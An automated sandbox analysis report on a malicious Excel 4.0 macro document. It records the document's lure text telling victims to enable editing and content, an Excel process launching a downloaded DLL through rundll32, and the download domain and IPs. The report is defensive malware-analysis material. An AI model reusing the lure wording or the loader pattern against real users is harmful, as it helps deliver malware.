Loading ...

Play interactive tourEdit tour

Analysis Report 32154f4c_by_Libranalysis.xls

Overview

General Information

Sample Name:32154f4c_by_Libranalysis.xls
Analysis ID:412197
MD5:32154f4c3997c4c3d695bf52704e5302
SHA1:4e47b10ce837d78b31bbcf5b37622488a8c436c9
SHA256:c92b6793b9457a9f0909c33a41f04a6d34389dce626d5eabcec7a2384270f53b
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 3920 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6320 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6376 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3920, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 6320

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49715 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 192.185.39.58:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.aadrm.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.cortana.ai
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.office.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.onedrive.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://augloop.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://augloop.office.com/v2
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cdn.entity.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://clients.config.office.net/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://config.edge.skype.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cortana.ai
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cortana.ai/api
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://cr.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dev.cortana.ai
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://devnull.onenote.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://directory.services.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://graph.windows.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://graph.windows.net/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://lifecycle.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://login.windows.local
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://management.azure.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://management.azure.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://messaging.office.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ncus.contentsync.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://officeapps.live.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://onedrive.live.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://outlook.office.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://outlook.office365.com/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://powerlift.acompli.net
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://settings.outlook.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://staging.cortana.ai
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://tasks.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://webshell.suite.office.com
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://wus2.contentsync.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49715 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11" from the yellow bar above 12 13" Once You have Enable Editing, please click
Source: Screenshot number: 4Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,,_ WHY I CANNOT OPEN THIS DOCUMENT ? 19
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT ? W You are using iOS or
Source: Document image extraction number: 6Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 6Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 32154f4c_by_Libranalysis.xlsInitial sample: CALL
Source: 32154f4c_by_Libranalysis.xlsInitial sample: CALL
Source: 32154f4c_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 32154f4c_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 32154f4c_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/6@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{64710AFD-9159-4D65-A53F-ED4F85F0F1DB} - OProcSessId.datJump to behavior
Source: 32154f4c_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
